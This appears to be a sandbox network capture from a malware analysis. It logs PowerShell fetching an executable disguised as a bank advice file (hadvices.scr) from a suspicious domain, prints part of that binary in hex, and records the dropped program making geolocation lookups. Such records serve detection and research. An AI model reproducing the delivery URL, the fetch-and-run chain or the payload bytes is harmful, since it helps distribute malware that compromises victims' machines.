                                                    2024-05-01 13:17:07 UTC1369INData Raw: 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2
                                                    Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                    2024-05-01 13:17:07 UTC1369INData Raw: 82 c9 7e d5 5f b7 97 c3 c8 3c 61 e0 7f d8 96 1b 6f 08 5f f3 67 ac eb df 14 23 d3 6d ef 87 4f dc 24 9a 7f 9b 22 1f f9 e9 1c 7e 5f 5e 68 03 f4 f2 8a f2 df d9 9b c7 5f 12 be 23 78 06 ea f3 e2 8f 80 74 6f 86 de 22 86 fd e2 87 4a d3 7c 49 ff 00 09 04 72 db 88 e3 29 71 f6 8f 22 df 04 b9 90 6c f2 f8 f2 c7 26 bd 4a 80 0a 2b c9 7f 6a 5f 1f 7c 56 f8 77 e1 1d 32 eb e1 4f c3 7d 0f e2 56 b1 2d e7 97 79 63 aa f8 b3 fe 11 d8 ed 61 f2 db f7 82 4f b3 dc 79 9f 3e c1 b3 03 83 d6 be 12 fd b8 3f e0 b6 9f b5 17 fc 13 e3 c1 0b e2 8f 88 5f b1 4c 27 c2 71 ca 23 9f 5c d1 7e 27 c5 a9 59 db b1 ed 37 97 a7 f9 90 7f d7 49 23 08 4e 00 cd 00 7e a3 d1 5f cf cf fc 47 1d 75 ff 00 46 cb 6b ff 00 87 0c ff 00 f2 ba ba 8f 83 df f0 79 4f 8c 3e 3e fc 45 d2 bc 23 e0 9f d9 1e f3 c4 de 24 d6 a6 f2
                                                    Data Ascii: ~_<ao_g#mO$"~_^h_#xto"J|Ir)q"l&J+j_|Vw2O}V-ycaOy>?_L'q#\~'Y7I#N~_GuFkyO>>E#$
                                                    2024-05-01 13:17:07 UTC1369INData Raw: 1f f4 54 24 ff 00 c1 06 9b ff 00 c6 28 ff 00 87 db fe d3 ff 00 f4 54 64 ff 00 c1 06 9b ff 00 c6 2b 9f fe 22 26 59 fc b3 fb 97 f9 9e e7 fc 49 a7 1c 7f cf dc 3f fe 0c 9f ff 00 2b 3f a1 bd df ed 7e 94 6e ff 00 6b f4 af e7 93 fe 1f 6f fb 4f ff 00 d1 51 93 ff 00 04 1a 6f ff 00 18 a3 fe 1f 6f fb 4f ff 00 d1 51 93 ff 00 04 1a 6f ff 00 18 a3 fe 22 26 59 fc b3 fb 97 f9 8f fe 24 d3 8e 3f e7 ed 0f fc 19 3f fe 56 7f 43 7b bf da fd 29 37 7f b5 fa 57 f3 cb ff 00 0f b7 fd a7 ff 00 e8 a8 c9 ff 00 82 0d 37 ff 00 8c 51 ff 00 0f b7 fd a7 ff 00 e8 a8 c9 ff 00 82 0d 37 ff 00 8c 51 ff 00 11 13 2c fe 59 fd cb fc c3 fe 24 d3 8e 3f e7 ed 0f fc 19 3f fe 56 7f 43 58 ff 00 69 7f 2a 00 c1 fb c3 f2 af e7 8f fe 1f 63 fb 4f 1f f9 aa 12 7f e0 83 4d ff 00 e3 15 63 4f ff 00 82 ce fe d4 7a
                                                    Data Ascii: T$(Td+"&YI?+?~nkoOQooOQo"&Y$??VC{)7W7Q7Q,Y$??VCXi*cOMcOz
                                                    2024-05-01 13:17:07 UTC1369INData Raw: 3a f5 9d a7 87 23 75 ff 00 9e 77 b7 91 5b dc 0f fc 06 79 e8 03 f9 de ff 00 82 e0 7f c1 65 fc 59 ff 00 05 55 fd a3 75 26 b4 be bc d3 fe 10 f8 5e ea 48 fc 27 a1 ee f2 e3 91 3f d5 ff 00 68 5c 27 f1 dc ca 37 7f d7 28 df cb 1f f2 d0 c9 ef df f0 40 af f8 37 30 ff 00 c1 45 fc 37 0f c5 af 8b 57 da 96 83 f0 95 6e de 0d 33 4e b2 60 97 be 2b 78 a4 d9 27 ef 71 fb 9b 61 26 63 2f fe b2 43 e6 04 31 ec 12 57 e4 8d 7f 6f 3f f0 4a ef 0d e8 de 16 ff 00 82 6b fc 01 b4 f0 ff 00 97 fd 8f 1f c3 ed 12 48 1d 17 fd 6f 99 65 14 8f 27 fd b4 77 2f f5 34 01 7f f6 71 ff 00 82 71 7c 07 fd 92 f4 3b 7d 3b e1 ef c2 5f 01 f8 69 6d 53 cb fb 4c 1a 44 72 de ca 0f fc f4 b8 90 3d c4 9f f6 d2 43 5d 77 c5 df d9 5f e1 9f ed 01 e1 f6 d2 7c 71 f0 f7 c1 3e 2c d3 64 5d 82 df 56 d1 2d ef 11 47 5f e3 8c
                                                    Data Ascii: :#uw[yeYUu&^H'?h\'7(@70E7Wn3N`+x'qa&c/C1Wo?JkHoe'w/4qq|;};_imSLDr=C]w_|q>,d]V-G_
                                                    2024-05-01 13:17:07 UTC1369INData Raw: 1f 83 93 f8 3d bc 59 e1 7d 4b 51 30 fd 9e 2f 12 5f 68 11 cb ad 5a 8e 99 07 3f 67 79 38 fb f2 c3 27 e7 5f a8 1f f0 66 8f c4 1d 4b c6 ff 00 b1 0f c6 09 b5 6b eb ad 4b 52 ba f8 97 71 aa dd 5c 5d 48 65 92 e2 7b 8d 3e cb cc 91 e4 3f 7d dc a6 79 fa f7 af 33 ff 00 83 a3 7f e0 84 9a 57 89 bc 13 af 7e d3 5f 09 34 58 74 cd 6b 45 8d ef fc 79 a3 da c7 e5 c3 aa db e3 32 6a b1 a0 e9 71 1f 2f 71 ff 00 3d 23 fd e7 12 47 21 97 5b fe 0c 89 d6 7e d5 fb 35 7c 74 b1 ff 00 9f 5f 13 69 f3 ff 00 df cb 69 07 fe d3 a0 0f dc 4a 28 a2 80 0a 0d 19 a0 9e 28 02 bc 92 73 db 76 38 1e 94 d4 7f 31 47 dd 61 dc e2 87 40 fd b0 18 72 7d ab f3 8f fe 0a fb ff 00 05 79 87 f6 7b b3 bf f8 6b f0 d6 f9 66 f1 c5 c2 18 f5 1d 4e 03 e6 47 a0 c7 fd c5 c7 59 cf a7 f0 75 35 c1 99 66 54 30 34 3d bd 73 ea f8
                                                    Data Ascii: =Y}KQ0/_hZ?gy8'_fKkKRq\]He{>?}y3W~_4XtkEy2jq/q=#G![~5|t_iiJ((sv81Ga@r}y{kfNGYu5fT04=s
                                                    2024-05-01 13:17:07 UTC1369INData Raw: 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28
                                                    Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                    2024-05-01 13:17:07 UTC1369INData Raw: c6 12 40 1a f3 e2 87 8a 2f f5 21 2f fd 3b 5b 11 65 1a 7e 12 5b ce 7f ed a5 7e af d0 01 45 14 50 01 45 14 50 06 6e b3 a1 d9 f8 8f 4a b8 b1 bd b6 82 f2 ce f6 37 b7 9e 09 93 cc 8e 58 df ef a3 0e 98 3d 2b f2 7f fe 0d bf fd 9a 63 fd 89 7f 6d df db bb e1 04 2b 24 7a 6f 83 7c 57 a1 49 a6 24 9f eb 3e c1 73 1e a3 3d 9e 7e b6 c6 3a fd 72 af 32 f8 7d fb 2e f8 43 e1 8f ed 0f f1 0b e2 86 91 67 73 6f e2 ff 00 8a 70 e9 96 fa fc f2 5c 3c 91 dc 26 9f 1c 91 5b 62 33 c2 11 1c 8e 3f 2f a5 00 7a 6d 06 8a 0f 4a 00 af 24 9c f6 dd 8e 07 a5 35 1f 7a 8f ba c0 75 38 a1 90 4b fc 3f 2b 0e 4f b5 7e 73 ff 00 c1 5e 7f e0 af 50 fe ce f6 77 df 0d be 1a df 47 73 e3 db 85 31 ea 3a 84 47 cc 8b 40 8c ff 00 39 8f a7 f0 75 35 c1 99 66 54 30 34 3d bd 73 ea b8 27 82 73 5e 2a cd 69 e5 39 4c 39 e7
                                                    Data Ascii: @/!/;[e~[~EPEPnJ7X=+cm+$zo|WI$>s=~:r2}.Cgsop\<&[b3?/zmJ$5zu8K?+O~s^PwGs1:G@9u5fT04=s's^*i9L9


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.749705172.67.141.1954434912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:09 UTC159OUTGET /hsbc/hadvices.scr HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                    Host: advising-receipts.com
                                                    2024-05-01 13:17:09 UTC588INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:09 GMT
                                                    Content-Type: application/octet-stream
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFxKANaLQlaGvnKwYCL1YKljP6BEXt05ME%2Bg%2BDKUeF%2FemEYLpSrI31RHRcLfQaze0c3HgJPkuDj%2FO8QSQzevwIsdzEcyF3pEjXzsB9KImB9vFMOFq30%2FW4402FVWYweze%2BjE1WXb8rI%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00cd5ac5238a6-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:09 UTC781INData Raw: 33 31 65 61 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 0b 33 dd 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 0f 00 00 08 00 00 00 00 00 00 1e f8 0f 00 00 20 00 00 00 00 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                    Data Ascii: 31eaMZ@!L!This program cannot be run in DOS mode.$PEL30 @ @@
                                                    2024-05-01 13:17:09 UTC1369INData Raw: 00 c0 00 40 00 f0 00 00 00 cc 01 30 ff 88 01 18 ff 59 06 00 00 bf 08 00 00 7e 11 00 00 fd 22 00 00 20 00 09 00 0a 00 0d 00 04 08 00 00 04 04 00 00 07 04 00 00 09 04 00 00 0a 04 00 00 0c 04 00 00 11 04 00 00 00 00 00 00 2e 00 5f 21 00 5f 26 00 5f 2c 00 5f 2e 00 5f 3f 00 5f 5e 00 5f 7c 00 5f 7c 7c 00 5f 53 00 2b 00 41 00 41 41 00 41 44 56 00 41 45 00 41 45 58 00 41 48 00 41 49 ff ff 00 41 4e ff 00 41 4f 00 41 4f 45 00 41 4f 58 ff ff 00 41 50 49 00 41 53 50 00 41 54 52 00 41 55 ff ff 00 41 58 00 41 58 52 00 42 00 42 42 00 42 48 00 42 49 4d 00 42 56 41 00 42 56 44 00 43 00 43 43 ff ff 00 43 43 32 00 43 43 4b 00 43 45 4e 00 43 48 ff ff 00 43 48 32 00 43 4a 00 43 54 00 43 56 44 00 44 00 44 45 4e 00 44 48 00 44 49 4d 00 44 52 00 44 58 00 44 58 52 00 44 5a ff ff
                                                    Data Ascii: @0Y~" ._!_&_,_._?_^_|_||_S+AAAADVAEAEXAHAIANAOAOEAOXAPIASPATRAUAXAXRBBBBHBIMBVABVDCCCCC2CCKCENCHCH2CJCTCVDDDENDHDIMDRDXDXRDZ
                                                    2024-05-01 13:17:09 UTC1369INData Raw: 30 30 00 33 31 30 35 00 33 31 30 36 00 33 31 30 37 00 33 31 30 38 00 33 31 30 39 00 33 31 30 41 00 33 31 30 42 00 33 31 30 43 00 33 31 30 44 00 33 31 30 45 00 33 31 30 46 00 33 31 31 30 00 33 31 31 31 00 33 31 31 32 00 33 31 31 33 00 33 31 31 34 00 33 31 31 35 00 33 31 31 36 00 33 31 31 37 00 33 31 31 38 00 33 31 31 39 00 33 31 31 41 00 33 31 31 42 00 33 31 31 43 00 33 31 31 44 00 33 31 31 45 00 33 31 31 46 00 33 31 32 30 00 33 31 32 31 00 33 31 32 32 00 33 31 32 33 00 33 31 32 34 00 33 31 32 35 00 33 31 32 36 00 33 31 32 37 00 33 31 32 38 00 33 31 32 39 00 00 00 00 00 21 00 26 00 2a 00 2b 00 2c 00 2d 00 2e 00 3f 00 5f 00 c7 02 c9 02 ca 02 cb 02 d9 02 00 30 05 31 06 31 07 31 08 31 09 31 0a 31 0b 31 0c 31 0d 31 0e 31 0f 31 10 31 11 31 12 31 13 31 14 31 15
                                                    Data Ascii: 0031053106310731083109310A310B310C310D310E310F3110311131123113311431153116311731183119311A311B311C311D311E311F3120312131223123312431253126312731283129!&*+,-.?_01111111111111111
                                                    2024-05-01 13:17:09 UTC1369INData Raw: 00 33 30 43 42 00 33 30 43 43 00 33 30 43 44 00 33 30 43 45 00 33 30 43 46 00 33 30 44 30 00 33 30 44 31 00 33 30 44 32 00 33 30 44 33 00 33 30 44 34 00 33 30 44 35 00 33 30 44 36 00 33 30 44 37 00 33 30 44 38 00 33 30 44 39 00 33 30 44 41 00 33 30 44 42 00 33 30 44 43 00 33 30 44 44 00 33 30 44 45 00 33 30 44 46 00 33 30 45 30 00 33 30 45 31 00 33 30 45 32 00 33 30 45 33 00 33 30 45 34 00 33 30 45 35 00 33 30 45 36 00 33 30 45 37 00 33 30 45 38 00 33 30 45 39 00 33 30 45 41 00 33 30 45 42 00 33 30 45 43 00 33 30 45 44 00 33 30 45 45 00 33 30 45 46 00 33 30 46 30 00 33 30 46 31 00 33 30 46 32 00 33 30 46 33 00 33 30 46 34 00 33 30 46 35 00 33 30 46 36 00 33 30 46 37 00 33 30 46 38 00 33 30 46 39 00 33 30 46 41 00 33 30 46 42 00 33 30 46 43 00 33 30 46 44
                                                    Data Ascii: 30CB30CC30CD30CE30CF30D030D130D230D330D430D530D630D730D830D930DA30DB30DC30DD30DE30DF30E030E130E230E330E430E530E630E730E830E930EA30EB30EC30ED30EE30EF30F030F130F230F330F430F530F630F730F830F930FA30FB30FC30FD
                                                    2024-05-01 13:17:09 UTC1369INData Raw: 4e 41 4e 00 4e 41 4e 47 00 4e 41 4f 00 4e 45 00 4e 45 49 00 4e 45 4e 00 4e 45 4e 47 00 4e 49 00 4e 49 41 4e 00 4e 49 41 4e 47 00 4e 49 41 4f 00 4e 49 45 00 4e 49 4e 00 4e 49 4e 47 00 4e 49 55 00 4e 4f 4e 47 00 4e 4f 55 00 4e 55 00 4e 55 41 4e 00 4e 55 45 00 4e 55 4f 00 4e 56 00 4f 00 4f 55 00 50 41 00 50 41 49 00 50 41 4e 00 50 41 4e 47 00 50 41 4f 00 50 45 49 00 50 45 4e 00 50 45 4e 47 00 50 49 00 50 49 41 4e 00 50 49 41 4f 00 50 49 45 00 50 49 4e 00 50 49 4e 47 00 50 4f 00 50 4f 55 00 50 55 00 51 49 00 51 49 41 00 51 49 41 4e 00 51 49 41 4e 47 00 51 49 41 4f 00 51 49 45 00 51 49 4e 00 51 49 4e 47 00 51 49 4f 4e 47 00 51 49 55 00 51 55 00 51 55 41 4e 00 51 55 45 00 51 55 4e 00 52 41 4e 00 52 41 4e 47 00 52 41 4f 00 52 45 00 52 45 4e 00 52 45 4e 47 00 52
                                                    Data Ascii: NANNANGNAONENEINENNENGNINIANNIANGNIAONIENINNINGNIUNONGNOUNUNUANNUENUONVOOUPAPAIPANPANGPAOPEIPENPENGPIPIANPIAOPIEPINPINGPOPOUPUQIQIAQIANQIANGQIAOQIEQINQINGQIONGQIUQUQUANQUEQUNRANRANGRAORERENRENGR
                                                    2024-05-01 13:17:09 UTC1369INData Raw: 00 ff 00 00 01 01 01 02 01 03 01 04 01 05 01 06 01 07 01 08 01 09 01 0a 01 0b 01 0c 01 0d 01 0e 01 0f 01 10 01 11 01 12 01 13 01 14 01 15 01 16 01 17 01 18 01 19 01 1a 01 1b 01 1c 01 1d 01 1e 01 1f 01 20 01 21 01 22 01 23 01 24 01 25 01 26 01 27 01 28 01 29 01 2a 01 2b 01 2c 01 2d 01 2e 01 2f 01 30 01 31 01 32 01 33 01 34 01 35 01 36 01 37 01 38 01 39 01 3a 01 3b 01 3c 01 3d 01 3e 01 3f 01 40 01 41 01 42 01 43 01 44 01 45 01 46 01 47 01 48 01 49 01 4a 01 4b 01 4c 01 4d 01 4e 01 4f 01 50 01 51 01 52 01 53 01 54 01 55 01 56 01 57 01 58 01 59 01 5a 01 5b 01 5c 01 5d 01 5e 01 5f 01 60 01 61 01 62 01 63 01 64 01 65 01 66 01 67 01 68 01 69 01 6a 01 6b 01 6c 01 6d 01 6e 01 6f 01 70 01 71 01 72 01 73 01 74 01 75 01 76 01 77 01 78 01 79 01 7a 01 7b 01 7c 01 7d 01
                                                    Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}
                                                    2024-05-01 13:17:09 UTC1369INData Raw: 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00 00 06 00 00
                                                    Data Ascii:
                                                    2024-05-01 13:17:09 UTC1369INData Raw: ff ff ff c8 ff ff ff d0 ff ff ff d8 ff ff ff e0 ff ff ff e8 ff ff ff f0 ff ff ff f8 ff ff ff 00 00 00 00 7c 7d 00 00 7c 79 00 00 7c 75 00 00 7c 71 00 00 7c 6d 00 00 7c 69 00 00 7c 65 00 00 7c 61 00 00 7c 5d 00 00 7c 59 00 00 7c 55 00 00 7c 51 00 00 7c 4d 00 00 7c 49 00 00 7c 45 00 00 7c 41 00 00 7c 3e 00 00 7c 3c 00 00 7c 3a 00 00 7c 38 00 00 7c 36 00 00 7c 34 00 00 7c 32 00 00 7c 30 00 00 7c 2e 00 00 7c 2c 00 00 7c 2a 00 00 7c 28 00 00 7c 26 00 00 7c 24 00 00 7c 22 00 00 7c 20 00 00 fc 1e 00 00 fc 1d 00 00 fc 1c 00 00 fc 1b 00 00 fc 1a 00 00 fc 19 00 00 fc 18 00 00 fc 17 00 00 fc 16 00 00 fc 15 00 00 fc 14 00 00 fc 13 00 00 fc 12 00 00 fc 11 00 00 fc 10 00 00 fc 0f 00 00 3c 0f 00 00 bc 0e 00 00 3c 0e 00 00 bc 0d 00 00 3c 0d 00 00 bc 0c 00 00 3c 0c 00 00
                                                    Data Ascii: |}|y|u|q|m|i|e|a|]|Y|U|Q|M|I|E|A|>|<|:|8|6|4|2|0|.|,|*|(|&|$|"| <<<<
                                                    2024-05-01 13:17:09 UTC1369INData Raw: 00 00 b8 01 00 00 a8 01 00 00 58 00 00 00 48 00 00 00 78 00 00 00 68 00 00 00 18 00 00 00 08 00 00 00 38 00 00 00 28 00 00 00 d8 00 00 00 c8 00 00 00 f8 00 00 00 e8 00 00 00 98 00 00 00 88 00 00 00 b8 00 00 00 a8 00 00 00 60 05 00 00 20 05 00 00 e0 05 00 00 a0 05 00 00 60 04 00 00 20 04 00 00 e0 04 00 00 a0 04 00 00 60 07 00 00 20 07 00 00 e0 07 00 00 a0 07 00 00 60 06 00 00 20 06 00 00 e0 06 00 00 a0 06 00 00 b0 02 00 00 90 02 00 00 f0 02 00 00 d0 02 00 00 30 02 00 00 10 02 00 00 70 02 00 00 50 02 00 00 b0 03 00 00 90 03 00 00 f0 03 00 00 d0 03 00 00 30 03 00 00 10 03 00 00 70 03 00 00 50 03 00 00 02 00 00 00 03 00 00 00 05 00 00 00 07 00 00 00 0b 00 00 00 0d 00 00 00 11 00 00 00 13 00 00 00 17 00 00 00 1d 00 00 00 1f 00 00 00 25 00 00 00 00 00 00 00 04
                                                    Data Ascii: XHxh8(` ` ` ` 0pP0pP%
                                                    2024-05-01 13:17:09 UTC1053INData Raw: 2c 1c 02 7b 94 00 00 04 6f 98 00 00 06 2d 0f 02 7b 94 00 00 04 6f 9a 00 00 06 14 fe 01 2a 16 2a ae 02 7b 94 00 00 04 2c 21 02 7b 94 00 00 04 6f 9a 00 00 06 2d 12 02 7b 94 00 00 04 6f 98 00 00 06 14 fe 01 16 fe 01 2a 17 2a 16 2a 6e 02 7b 94 00 00 04 2d 02 14 2a 02 7b 94 00 00 04 28 81 00 00 06 6f a0 00 00 06 2a ea 02 6f 9c 00 00 06 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 98 00 00 06 33 11 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 9a 00 00 06 2a 02 6f 9c 00 00 06 6f 9c 00 00 06 6f 98 00 00 06 2a 5e 02 03 6f 98 00 00 06 33 07 03 6f 9a 00 00 06 2a 03 6f 98 00 00 06 2a 46 02 2c 0c 02 6f 9e 00 00 06 2d 02 16 2a 17 2a 16 2a 3a 02 2c 0a 02 03 17 fe 01 6f 9f 00 00 06 2a 52 2b 08 02 6f 98 00 00 06 10 00 02 6f 98 00 00 06 2d f0 02 2a 52 2b 08 03 6f 9c 00 00 06 10 01 03 6f 9c
                                                    Data Ascii: ,{o-{o**{,!{o-{o***n{-*{(o*oooo3ooo*ooo*^o3o*o*F,o-***:,o*R+oo-*R+oo


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.74971523.56.12.1454437348C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:21 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                    Host: armmf.adobe.com
                                                    Connection: keep-alive
                                                    Accept-Language: en-US,en;q=0.9
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    If-None-Match: "78-5faa31cce96da"
                                                    If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                    2024-05-01 13:17:22 UTC198INHTTP/1.1 304 Not Modified
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                    ETag: "78-5faa31cce96da"
                                                    Date: Wed, 01 May 2024 13:17:21 GMT
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.749724172.67.177.1344438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:27 UTC85OUTGET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-05-01 13:17:27 UTC699INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:27 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:27 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ab4dzDZD7ACXuFM0rTRZ2WmquA6%2B3gUX%2Bc%2BOToBISiZ2VxRAvaBrPLG7hJvnL%2FGDN3MnM5gkP%2BMZ9p9qIhhbOzToW9IqUuAAB6CWtS0TazCOgVDJenEPtoWk2rWxIb5XxtAG5OIv"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00d4598200814-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:27 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
                                                    Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
                                                    2024-05-01 13:17:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.749727172.67.177.1344438336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:28 UTC61OUTGET /xml/149.18.24.96 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-05-01 13:17:28 UTC705INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:28 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:28 GMT
